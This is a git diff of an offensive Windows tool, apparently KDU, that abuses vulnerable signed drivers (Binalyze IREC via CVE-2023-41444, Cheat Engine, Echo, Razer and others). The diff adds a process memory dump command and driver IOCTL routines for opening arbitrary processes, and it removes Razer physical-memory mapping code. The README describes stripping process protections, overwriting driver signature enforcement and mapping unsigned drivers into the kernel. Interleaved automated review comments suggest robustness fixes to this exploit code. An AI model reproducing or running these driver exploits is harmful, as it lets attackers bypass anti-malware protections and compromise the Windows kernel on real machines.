diff --git a/README.md b/README.md
index 6641d9b..74c127e 100644
--- a/README.md
+++ b/README.md
@@ -24,6 +24,7 @@ It features:
###### KDU -prv ProviderID
###### KDU -ps ProcessID
###### KDU -pse Commandline
+###### KDU -dmp ProcessID
###### KDU -dse value
###### KDU -map filename
* -list - list currently available providers;
@@ -31,6 +32,7 @@ It features:
* -prv - optional, select vulnerability driver provider;
* -ps - modify process object of given ProcessID, downgrading any protections;
* -pse - launch program as ProtectedProcessLight-AntiMalware (PPL);
+* -dmp - dump virtual memory of the given process;
* -dse - write user defined value to the system DSE state flags;
* -map - map driver to the kernel and execute it entry point, this command have dependencies listed below;
* -scv version - optional, select shellcode version, default 1;
@@ -145,6 +147,9 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
| 38 | Pavel Yosifovich | KRegExp | Kernel Registry Explorer | Original | Undefined | |
| 39 | Inspect Element LTD | EchoDrv | Echo AntiCheat (spyware) | Original | Undefined | |
| 40 | NVidia | nvoclock | NVidia System Utility Driver | Original | 7.0.0.32 | |
+| 41 | Binalyze | IREC | Binalyze DFIR | Original | 3.11.0 | |
+| 42 | DavidXXW | PhyDMACC | SLIC ToolKit | WINRING0 | 1.2.0 | |
+| 43 | Razer | rzpnk | Razer Synapse | Original | 2.20.15.1104 | |
###### *At commit time, data maybe inaccurate.
@@ -212,6 +217,7 @@ Using this program might crash your computer with BSOD. Compiled binary and sour
* LOLDrivers, https://www.loldrivers.io
* ECHOH NO, https://github.com/kite03/echoac-poc/
* NVDrv, https://github.com/zer0condition/NVDrv
+* CVE-2023-41444, https://blog.dru1d.ninja/windows-driver-exploit-development-irec-sys-a5eb45093945
# Wormhole drivers code
diff --git a/Source/Hamakaze/KDU.vcxproj b/Source/Hamakaze/KDU.vcxproj
index 3b54b1a..ee1d08d 100644
--- a/Source/Hamakaze/KDU.vcxproj
+++ b/Source/Hamakaze/KDU.vcxproj
@@ -138,6 +138,7 @@
+
@@ -155,6 +156,7 @@
+
@@ -197,6 +199,7 @@
+
@@ -215,6 +218,7 @@
+
diff --git a/Source/Hamakaze/KDU.vcxproj.filters b/Source/Hamakaze/KDU.vcxproj.filters
index 7fc0925..9bfc8e3 100644
--- a/Source/Hamakaze/KDU.vcxproj.filters
+++ b/Source/Hamakaze/KDU.vcxproj.filters
@@ -213,6 +213,12 @@
Source Files\idrv
+
+ Source Files\idrv
+
+
+ Source Files\idrv
+
@@ -398,6 +404,12 @@
Source Files\idrv
+
+ Source Files\idrv
+
+
+ Source Files\idrv
+
diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
index 1a53fb5..d1f34ae 100644
--- a/Source/Hamakaze/KDU.vcxproj.user
+++ b/Source/Hamakaze/KDU.vcxproj.user
@@ -1,11 +1,11 @@

- -test
+ -prv 43 -dmp 440
WindowsLocalDebugger
- -prv 40 -dse 6
+ -prv 42 -map c:\install\dummy2.sys
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Hamakaze/idrv/binalyze.cpp b/Source/Hamakaze/idrv/binalyze.cpp
new file mode 100644
index 0000000..1481722
--- /dev/null
+++ b/Source/Hamakaze/idrv/binalyze.cpp
@@ -0,0 +1,56 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2023
+*
+* TITLE: BINALYZE.CPP
+*
+* VERSION: 1.40
+*
+* DATE: 20 Oct 2023
+*
+* Binalyze driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/binalyze.h"
+
+//
+// Based on CVE-2023-41444
+//
+
+/*
+* BeDrvOpenProcess
+*
+* Purpose:
+*
+* Open process via Binalyze driver.
+*
+*/
+BOOL WINAPI BeDrvOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle)
+{
+ UNREFERENCED_PARAMETER(DesiredAccess);
+
+ BOOL bResult = FALSE;
+ DWORD data = HandleToUlong(ProcessId);
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_IREC_OPEN_PROCESS,
+ &data,
+ sizeof(data),
+ &data,
+ sizeof(data));
+
+ *ProcessHandle = UlongToHandle(data);
+
+ return bResult;
+}
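Review bot: On a failed IOCTL, `*ProcessHandle` at the end of BeDrvOpenProcess is still assigned `UlongToHandle(data)`, and since `data` was loaded with the PID as input, a caller that trusts the out-parameter (or only checks it for NULL) receives the process id masquerading as a handle. Guard the store: `*ProcessHandle = bResult ? UlongToHandle(data) : NULL;`. The `DesiredAccess` argument is discarded via UNREFERENCED_PARAMETER, so whatever access the returned handle carries is decided by the driver, not the caller; a one-line comment at that line, `// DesiredAccess is ignored: the granted access mask is fixed by the driver`, would keep `-dmp` callers from assuming PROCESS_VM_READ is guaranteed.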
diff --git a/Source/Hamakaze/idrv/binalyze.h b/Source/Hamakaze/idrv/binalyze.h
new file mode 100644
index 0000000..b60e818
--- /dev/null
+++ b/Source/Hamakaze/idrv/binalyze.h
@@ -0,0 +1,32 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2023
+*
+* TITLE: BINALYZE.H
+*
+* VERSION: 1.40
+*
+* DATE: 20 Oct 2023
+*
+* Binalyze driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+#define IREC_DEVICE_TYPE (DWORD)0x8001
+#define IREC_FUNCTION_OPEN_PROCESS (DWORD)0x80A
+
+#define IOCTL_IREC_OPEN_PROCESS \
+ CTL_CODE(IREC_DEVICE_TYPE, IREC_FUNCTION_OPEN_PROCESS, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80012028
+
+BOOL WINAPI BeDrvOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/dbk.cpp b/Source/Hamakaze/idrv/dbk.cpp
index 497f5e9..176143a 100644
--- a/Source/Hamakaze/idrv/dbk.cpp
+++ b/Source/Hamakaze/idrv/dbk.cpp
@@ -4,9 +4,9 @@
*
* TITLE: DBK.CPP
*
-* VERSION: 1.32
+* VERSION: 1.40
*
-* DATE: 10 Jun 2023
+* DATE: 20 Oct 2023
*
* Cheat Engine's DBK driver routines.
*
@@ -651,3 +651,36 @@ BOOL DbkControlDSE(
return bResult;
}
+
+/*
+* DbkOpenProcess
+*
+* Purpose:
+*
+* Open process via CheatEngine driver.
+*
+*/
+BOOL WINAPI DbkOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle)
+{
+ UNREFERENCED_PARAMETER(DesiredAccess);
+
+ struct {
+ HANDLE ProcessHandle;
+ BYTE Special;
+ } outputBuffer = { NULL, 0 };
+
+ BOOL bResult = supCallDriver(DeviceHandle,
+ IOCTL_CE_OPENPROCESS,
+ &ProcessId,
+ sizeof(DWORD),
+ &outputBuffer,
+ sizeof(outputBuffer));
+
+ *ProcessHandle = outputBuffer.ProcessHandle;
+
+ return bResult;
+}
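Review bot: `supCallDriver` in DbkOpenProcess is handed `&ProcessId` with `sizeof(DWORD)`, i.e. the first four bytes of an 8-byte HANDLE on x64; this only works because the target is little-endian and the PID fits in 32 bits, and it differs from the sibling providers in this change, which copy the PID into a DWORD first. Prefer `DWORD processId = HandleToUlong(ProcessId);` and pass `&processId, sizeof(processId)`. The output struct `{ HANDLE ProcessHandle; BYTE Special; }` is padded to 16 bytes on x64, so the output length handed to the driver exceeds the 9 bytes of payload — presumably harmless for a METHOD_BUFFERED request, but a comment stating the length the driver expects would help since the driver side is not visible here.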
diff --git a/Source/Hamakaze/idrv/dbk.h b/Source/Hamakaze/idrv/dbk.h
index 4284737..d6acb9c 100644
--- a/Source/Hamakaze/idrv/dbk.h
+++ b/Source/Hamakaze/idrv/dbk.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: DBK.H
*
-* VERSION: 1.20
+* VERSION: 1.40
*
-* DATE: 14 Feb 2022
+* DATE: 20 Oct 2023
*
* Cheat Engine's DBK driver interface header.
*
@@ -25,6 +25,7 @@
#define DBK_DEVICE_TYPE (DWORD)FILE_DEVICE_UNKNOWN
+#define DBK_FUNC_OPEN_PROCESS (DWORD)0x0802
#define DBK_FUNC_ALLOCATEMEM_NONPAGED (DWORD)0x0826
#define DBK_FUNC_FREEMEM (DWORD)0x084C
#define DBK_FUNC_MAP_MEMORY (DWORD)0x084D
@@ -46,6 +47,10 @@
#define IOCTL_CE_EXECUTE_CODE \
CTL_CODE(DBK_DEVICE_TYPE, DBK_FUNC_EXECUTE_CODE, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
+#define IOCTL_CE_OPENPROCESS \
+ CTL_CODE(DBK_DEVICE_TYPE, DBK_FUNC_OPEN_PROCESS, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
+
+
BOOL DbkStartVulnerableDriver(
_In_ KDU_CONTEXT* Context);
@@ -57,3 +62,9 @@ BOOL DbkControlDSE(
_In_ PKDU_CONTEXT Context,
_In_ ULONG DSEValue,
_In_ ULONG_PTR Address);
+
+BOOL WINAPI DbkOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/echodrv.cpp b/Source/Hamakaze/idrv/echodrv.cpp
index b69291f..ab0e920 100644
--- a/Source/Hamakaze/idrv/echodrv.cpp
+++ b/Source/Hamakaze/idrv/echodrv.cpp
@@ -4,9 +4,9 @@
*
* TITLE: ECHODRV.CPP
*
-* VERSION: 1.33
+* VERSION: 1.40
*
-* DATE: 16 Jul 2023
+* DATE: 21 Oct 2023
*
* Inspect Element LTD spyware (anticheat) driver interface.
*
@@ -126,7 +126,7 @@ BOOL WINAPI EchoDrvRegisterDriver(
BOOL bResult;
ECHODRV_REGISTER regRequest;
- ECHODRV_VALIDATE_PROCESS procRequest;
+ ECHODRV_OPENPROCESS_REQUEST procRequest;
RtlSecureZeroMemory(®Request, sizeof(regRequest));
@@ -190,3 +190,37 @@ BOOL WINAPI EchoDrvUnregisterDriver(
return TRUE;
}
+
+/*
+* EchoDrvOpenProcess
+*
+* Purpose:
+*
+* Open process via Echo driver.
+*
+*/
+BOOL WINAPI EchoDrvOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle)
+{
+ BOOL bResult = FALSE;
+ ECHODRV_OPENPROCESS_REQUEST procRequest;
+
+ RtlSecureZeroMemory(&procRequest, sizeof(procRequest));
+
+ procRequest.ProcessId = HandleToUlong(ProcessId);
+ procRequest.DesiredAccess = DesiredAccess;
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_ECHODRV_OPEN_PROCESS,
+ &procRequest,
+ sizeof(procRequest),
+ &procRequest,
+ sizeof(procRequest));
+
+ *ProcessHandle = procRequest.ProcessHandle;
+
+ return bResult;
+}
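Review bot: EchoDrvOpenProcess returns only the IOCTL status and never inspects `procRequest.bSuccess`, even though `ECHODRV_OPENPROCESS_REQUEST` declares it as an `_Out_ BOOL` the driver fills in; if the driver can complete the IRP successfully while reporting a per-request failure there (the header suggests so, but the driver side is not visible), the caller gets TRUE together with a NULL or stale handle. Consider `bResult = bResult && procRequest.bSuccess;` before the store, and `*ProcessHandle = bResult ? procRequest.ProcessHandle : NULL;`. This is the only new OpenProcess routine in the change that actually forwards `DesiredAccess` to the driver, which is worth stating in the header comment so callers know the mask is honoured here but ignored by the other providers.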
diff --git a/Source/Hamakaze/idrv/echodrv.h b/Source/Hamakaze/idrv/echodrv.h
index adee8c8..87487f7 100644
--- a/Source/Hamakaze/idrv/echodrv.h
+++ b/Source/Hamakaze/idrv/echodrv.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2023
*
* TITLE: ECHODRV.H
*
-* VERSION: 1.33
+* VERSION: 1.40
*
-* DATE: 16 Jul 2023
+* DATE: 21 Oct 2023
*
* Inspect Element LTD spyware (anticheat) driver interface header.
*
@@ -47,13 +47,13 @@ typedef struct _ECHODRV_REGISTER {
_Out_ DWORD UniqCode; //0x1000 for call
} ECHODRV_REGISTER, * PECHODRV_REGISTER;
-typedef struct _ECHODRV_VALIDATE_PROCESS {
+typedef struct _ECHODRV_OPENPROCESS_REQUEST {
_In_ DWORD ProcessId;
_In_ ACCESS_MASK DesiredAccess;
_Out_ HANDLE ProcessHandle;
_Out_ BOOL bSuccess;
_Out_ DWORD UniqCode; //0x1001 for call
-} ECHODRV_VALIDATE_PROCESS, * PECHODRV_VALIDATE_PROCESS;
+} ECHODRV_OPENPROCESS_REQUEST, * PECHODRV_OPENPROCESS_REQUEST;
typedef struct _ECHODRV_COPYVM_REQUEST {
_In_ HANDLE ProcessHandle;
@@ -84,3 +84,9 @@ BOOL WINAPI EchoDrvWriteVirtualMemory(
_In_ ULONG_PTR VirtualAddress,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+
+BOOL WINAPI EchoDrvOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/kph.cpp b/Source/Hamakaze/idrv/kph.cpp
index 1a6947a..ad5137b 100644
--- a/Source/Hamakaze/idrv/kph.cpp
+++ b/Source/Hamakaze/idrv/kph.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: KPH.CPP
*
-* VERSION: 1.20
+* VERSION: 1.40
*
-* DATE: 08 Feb 2022
+* DATE: 20 Oct 2023
*
* KProcessHacker2 driver routines.
*
@@ -292,14 +292,14 @@ BOOL KphpDuplicateHandle(
}
/*
-* KphpOpenProcess
+* KphOpenProcess
*
* Purpose:
*
* Open process handle via KPH driver request.
*
*/
-BOOL KphpOpenProcess(
+BOOL WINAPI KphOpenProcess(
_In_ HANDLE DeviceHandle,
_In_ HANDLE ProcessId,
_In_ ACCESS_MASK DesiredAccess,
@@ -339,7 +339,7 @@ BOOL WINAPI KphRegisterDriver(
UNREFERENCED_PARAMETER(Param);
return supOpenPhysicalMemory(DeviceHandle,
- (pfnOpenProcessCallback)KphpOpenProcess,
+ (pfnOpenProcessCallback)KphOpenProcess,
(pfnDuplicateHandleCallback)KphpDuplicateHandle,
&g_KphPhysicalMemorySection);
}
diff --git a/Source/Hamakaze/idrv/kph.h b/Source/Hamakaze/idrv/kph.h
index 478320d..ac43a81 100644
--- a/Source/Hamakaze/idrv/kph.h
+++ b/Source/Hamakaze/idrv/kph.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: KPH.H
*
-* VERSION: 1.20
+* VERSION: 1.40
*
-* DATE: 08 Feb 2022
+* DATE: 20 Oct 2023
*
* KProcessHacker2 driver interface header.
*
@@ -85,3 +85,9 @@ BOOL WINAPI KphWriteKernelVirtualMemory(
_In_ ULONG_PTR Address,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+
+BOOL WINAPI KphOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/procexp.cpp b/Source/Hamakaze/idrv/procexp.cpp
index a3ab4b1..44e83b5 100644
--- a/Source/Hamakaze/idrv/procexp.cpp
+++ b/Source/Hamakaze/idrv/procexp.cpp
@@ -4,9 +4,9 @@
*
* TITLE: PROCEXP.CPP
*
-* VERSION: 1.32
+* VERSION: 1.40
*
-* DATE: 10 Jun 2023
+* DATE: 20 Oct 2023
*
* Process Explorer driver routines.
*
@@ -277,14 +277,14 @@ BOOL PexpDuplicateHandle(
}
/*
-* PexpOpenProcess
+* PexOpenProcess
*
* Purpose:
*
* Open process handle via ProcExp driver request.
*
*/
-BOOL PexpOpenProcess(
+BOOL WINAPI PexOpenProcess(
_In_ HANDLE DeviceHandle,
_In_ HANDLE ProcessId,
_In_ ACCESS_MASK DesiredAccess,
@@ -324,7 +324,7 @@ BOOL WINAPI PexRegisterDriver(
context->Victim = &g_ProcExpVictimSelf;
return supOpenPhysicalMemory(DeviceHandle,
- PexpOpenProcess,
+ PexOpenProcess,
PexpDuplicateHandle,
&g_PexPhysicalMemorySection);
}
diff --git a/Source/Hamakaze/idrv/procexp.h b/Source/Hamakaze/idrv/procexp.h
index 64d3c34..dce18ad 100644
--- a/Source/Hamakaze/idrv/procexp.h
+++ b/Source/Hamakaze/idrv/procexp.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: PROCEXP.H
*
-* VERSION: 1.20
+* VERSION: 1.40
*
-* DATE: 08 Feb 2022
+* DATE: 20 Oct 2023
*
* Process Explorer driver interface header.
*
@@ -80,3 +80,9 @@ BOOL WINAPI PexWriteKernelVirtualMemory(
_In_ ULONG_PTR Address,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+
+BOOL WINAPI PexOpenProcess(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/rzpnk.cpp b/Source/Hamakaze/idrv/rzpnk.cpp
index 418cdee..11e81bc 100644
--- a/Source/Hamakaze/idrv/rzpnk.cpp
+++ b/Source/Hamakaze/idrv/rzpnk.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: RZPNK.CPP
*
-* VERSION: 1.00
+* VERSION: 1.40
*
-* DATE: 02 Feb 2020
+* DATE: 20 Oct 2023
*
* Razer Overlay Support driver routines.
*
@@ -20,69 +20,10 @@
#include "global.h"
#include "idrv/rzpnk.h"
-/*{
-
-//
-// Unfortunately all what it can - read/write to first 4gb of phys RAM.
-// Exploitation of this driver in CVE-2017-14398 was a PURELY accidential.
-//
- KDU_MAX_NTBUILDNUMBER,
- IDR_RAZER,
- 0,
- (LPWSTR)L"CVE-2017-9769, CVE-2017-9770",
- (LPWSTR)L"Razer",
- (LPWSTR)L"47CD78C9-64C3-47C2-B80F-677B887CF095",
- (provReadKernelVM)KDUProviderStub,
- (provWriteKernelVM)KDUProviderStub,
- (provVirtualToPhysical)KDUProviderStub,
- (provReadControlRegister)KDUProviderStub,
- (provReadPhysicalMemory)RazerReadPhysicalMemory,
- (provWritePhysicalMemory)RazerWritePhysicalMemory,
- (provRegisterDriver)RazerRegisterDriver,
- (provUnregisterDriver)RazerUnregisterDriver
-}*/
-
//
-// Based on CVE-2017-9769, CVE-2017-9770.
+// Based on CVE-2017-9769.
//
-HANDLE g_PhysicalMemorySection = NULL;
-
-/*
-* RazerCallDriver
-*
-* Purpose:
-*
-* Call Razer Rzpnk driver.
-*
-*/
-BOOL RazerCallDriver(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG IoControlCode,
- _In_ PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _In_opt_ PVOID OutputBuffer,
- _In_opt_ ULONG OutputBufferLength)
-{
- BOOL bResult = FALSE;
- IO_STATUS_BLOCK ioStatus;
-
- NTSTATUS ntStatus = NtDeviceIoControlFile(DeviceHandle,
- NULL,
- NULL,
- NULL,
- &ioStatus,
- IoControlCode,
- InputBuffer,
- InputBufferLength,
- OutputBuffer,
- OutputBufferLength);
-
- bResult = NT_SUCCESS(ntStatus);
- SetLastError(RtlNtStatusToDosError(ntStatus));
- return bResult;
-}
-
/*
* RazerOpenProcess
*
@@ -91,294 +32,28 @@ BOOL RazerCallDriver(
* Call ZwOpenProcess via razer driver request.
*
*/
-BOOL RazerOpenProcess(
+BOOL WINAPI RazerOpenProcess(
_In_ HANDLE DeviceHandle,
_In_ HANDLE ProcessId,
+ _In_ ACCESS_MASK DesiredAccess,
_Out_ PHANDLE ProcessHandle
)
{
BOOL bResult;
RAZER_OPEN_PROCESS request;
+ UNREFERENCED_PARAMETER(DesiredAccess);
+
request.ProcessId = ProcessId;
request.ProcessHandle = NULL;
- bResult = RazerCallDriver(DeviceHandle,
+ bResult = supCallDriver(DeviceHandle,
IOCTL_RZPNK_OPEN_PROCESS,
&request,
sizeof(request),
&request,
sizeof(request));
- if (bResult) {
- *ProcessHandle = request.ProcessHandle;
- }
-
- return bResult;
-}
-
-/*
-* RazerMapMemory
-*
-* Purpose:
-*
-* Map physical memory through \Device\PhysicalMemory.
-*
-*/
-PVOID RazerMapMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _In_ ULONG ViewSize)
-{
- BOOL bResult = FALSE;
- DWORD dwError = ERROR_SUCCESS;
- RAZER_MAP_SECTION_INFO request;
- HANDLE selfHandle;
-
- UNREFERENCED_PARAMETER(PhysicalAddress);
-
- CLIENT_ID clientID;
-
- clientID.UniqueProcess = UlongToHandle(GetCurrentProcessId());
- clientID.UniqueThread = NULL;
-
- OBJECT_ATTRIBUTES dummy;
- InitializeObjectAttributes(&dummy, NULL, 0, NULL, NULL);
-
- if (!NT_SUCCESS(NtOpenProcess(&selfHandle, PROCESS_ALL_ACCESS, &dummy, &clientID)))
- return NULL;
-
- RtlSecureZeroMemory(&request, sizeof(request));
- request.ViewCommitSize = ViewSize;
- request.ProcessHandle = selfHandle;
- request.ProcessId = clientID.UniqueProcess;
- request.SectionHandle = g_PhysicalMemorySection;
-
- bResult = RazerCallDriver(DeviceHandle,
- IOCTL_RZPNK_MAP_SECTION_USER_MODE,
- &request,
- sizeof(request),
- &request,
- sizeof(request));
-
- if (!bResult) {
- dwError = GetLastError();
- }
- else {
- dwError = RtlNtStatusToDosError(request.Status);
- }
-
- CloseHandle(selfHandle);
-
- SetLastError(dwError);
- return request.MappedBaseAddress;
-}
-
-/*
-* RazerReadWritePhysicalMemory
-*
-* Purpose:
-*
-* Read/Write virtual memory via Razer.
-*
-*/
-BOOL WINAPI RazerReadWritePhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR Address,
- _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
- _In_ ULONG NumberOfBytes,
- _In_ BOOLEAN DoWrite)
-{
- BOOL bResult = FALSE;
- DWORD dwError = ERROR_SUCCESS;
-
- ULONG ViewSize;
-
- if ((Address + NumberOfBytes) > MAXDWORD32)
- return FALSE;
-
- ViewSize = Address + NumberOfBytes;
-
- PVOID mappedSection = RazerMapMemory(DeviceHandle, Address, ViewSize);
- if (mappedSection) {
-
- if (DoWrite) {
- RtlCopyMemory(RtlOffsetToPointer(mappedSection, Address), Buffer, NumberOfBytes);
- }
- else {
- RtlCopyMemory(Buffer, RtlOffsetToPointer(mappedSection, Address), NumberOfBytes);
- }
-
- NtUnmapViewOfSection(NtCurrentProcess(), mappedSection);
-
- bResult = TRUE;
- }
-
- SetLastError(dwError);
- return bResult;
-}
-
-/*
-* RazerReadPhysicalMemory
-*
-* Purpose:
-*
-* Read from physical memory.
-*
-*/
-BOOL WINAPI RazerReadPhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _In_ PVOID Buffer,
- _In_ ULONG NumberOfBytes)
-{
- return RazerReadWritePhysicalMemory(DeviceHandle,
- PhysicalAddress,
- Buffer,
- NumberOfBytes,
- FALSE);
-}
-
-/*
-* RazerWritePhysicalMemory
-*
-* Purpose:
-*
-* Write to physical memory.
-*
-*/
-BOOL WINAPI RazerWritePhysicalMemory(
- _In_ HANDLE DeviceHandle,
- _In_ ULONG_PTR PhysicalAddress,
- _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
- _In_ ULONG NumberOfBytes)
-{
- return RazerReadWritePhysicalMemory(DeviceHandle,
- PhysicalAddress,
- Buffer,
- NumberOfBytes,
- TRUE);
-}
-
-/*
-* RazerRegisterDriver
-*
-* Purpose:
-*
-* Initialize Razer specific global variable (section handle value).
-* Must be called before accessing Kernel R/W primitives.
-*
-*/
-BOOL WINAPI RazerRegisterDriver(
- _In_ HANDLE DeviceHandle)
-{
- BOOL bResult = FALSE;
- ULONG SectionObjectType = (ULONG)-1;
- HANDLE processHandle = NULL;
- HANDLE sectionHandle = NULL;
- PSYSTEM_HANDLE_INFORMATION_EX handleArray = NULL;
- UNICODE_STRING ustr;
- OBJECT_ATTRIBUTES obja;
-
- do {
- //
- // Open System process.
- //
- if (!RazerOpenProcess(DeviceHandle, (HANDLE)SYSTEM_PID_MAGIC, &processHandle))
- break;
-
- //
- // Open dummy section handle.
- //
- RtlInitUnicodeString(&ustr, L"\\KnownDlls\\kernel32.dll");
- InitializeObjectAttributes(&obja, &ustr, OBJ_CASE_INSENSITIVE, NULL, NULL);
- if (!NT_SUCCESS(NtOpenSection(§ionHandle, SECTION_QUERY, &obja)))
- break;
-
- handleArray = (PSYSTEM_HANDLE_INFORMATION_EX)supGetSystemInfo(SystemExtendedHandleInformation);
- if (handleArray == NULL)
- break;
-
- ULONG i;
- DWORD currentProcessId = GetCurrentProcessId();
-
- //
- // Find dummy section handle and remember it object type index.
- //
- for (i = 0; i < handleArray->NumberOfHandles; i++) {
- if (handleArray->Handles[i].UniqueProcessId == currentProcessId &&
- handleArray->Handles[i].HandleValue == (ULONG_PTR)sectionHandle)
- {
- SectionObjectType = handleArray->Handles[i].ObjectTypeIndex;
- break;
- }
- }
-
- NtClose(sectionHandle);
- sectionHandle = NULL;
-
- if (SectionObjectType == (ULONG)-1)
- break;
-
- HANDLE testHandle = NULL;
-
- //
- // Some heur to find \Device\PhysicalMemory section.
- //
- for (i = 0; i < handleArray->NumberOfHandles; i++) {
- if (handleArray->Handles[i].UniqueProcessId == SYSTEM_PID_MAGIC &&
- handleArray->Handles[i].ObjectTypeIndex == (ULONG_PTR)SectionObjectType &&
- handleArray->Handles[i].GrantedAccess == SECTION_ALL_ACCESS)
- {
- testHandle = (HANDLE)(SYSTEM_USER_TO_KERNEL_HANDLE + handleArray->Handles[i].HandleValue);
- g_PhysicalMemorySection = testHandle;
-
- PVOID testBuffer = RazerMapMemory(DeviceHandle, 0, 0x100000); //1mb
- if (testBuffer) {
-
- ULONG_PTR PML4 = supGetPML4FromLowStub1M((ULONG_PTR)testBuffer);
-
- NtUnmapViewOfSection(NtCurrentProcess(), testBuffer);
-
- //
- // PML4 found, section looks legit.
- //
- if (PML4)
- break;
- }
- g_PhysicalMemorySection = NULL;
- }
- }
-
- //
- // Remember section handle if found and valid.
- //
- if (testHandle) {
- g_PhysicalMemorySection = testHandle;
- bResult = TRUE;
- }
-
- } while (FALSE);
-
- if (sectionHandle) NtClose(sectionHandle);
- if (processHandle) NtClose(processHandle);
- if (handleArray) supHeapFree(handleArray);
-
+ *ProcessHandle = request.ProcessHandle;
return bResult;
}
-
-/*
-* RazerUnregisterDriver
-*
-* Purpose:
-*
-* Free razer driver related resources.
-*
-*/
-BOOL WINAPI RazerUnregisterDriver(
- _In_ HANDLE DeviceHandle)
-{
- UNREFERENCED_PARAMETER(DeviceHandle);
-
- return TRUE;
-}
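Review bot: The `if (bResult)` guard around the handle store in RazerOpenProcess is dropped, so `*ProcessHandle` now receives `request.ProcessHandle` unconditionally; because the request is initialised with `ProcessHandle = NULL` this yields NULL on failure, which is a reasonable contract but differs from the previous behaviour (the caller's variable was left untouched) and is not stated anywhere. Add `// NULL when the driver request failed` on the store, and at `UNREFERENCED_PARAMETER(DesiredAccess)` note that the access mask of the returned handle is chosen by the driver — the header comment still says it calls ZwOpenProcess, which suggests a hard-coded mask, but that cannot be confirmed from here. The remainder of the hunk is a pure removal of the physical-memory path and needs no comment.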
diff --git a/Source/Hamakaze/idrv/rzpnk.h b/Source/Hamakaze/idrv/rzpnk.h
index 3c5db59..177ed9e 100644
--- a/Source/Hamakaze/idrv/rzpnk.h
+++ b/Source/Hamakaze/idrv/rzpnk.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: RZPNK.H
*
-* VERSION: 1.00
+* VERSION: 1.40
*
-* DATE: 02 Feb 2020
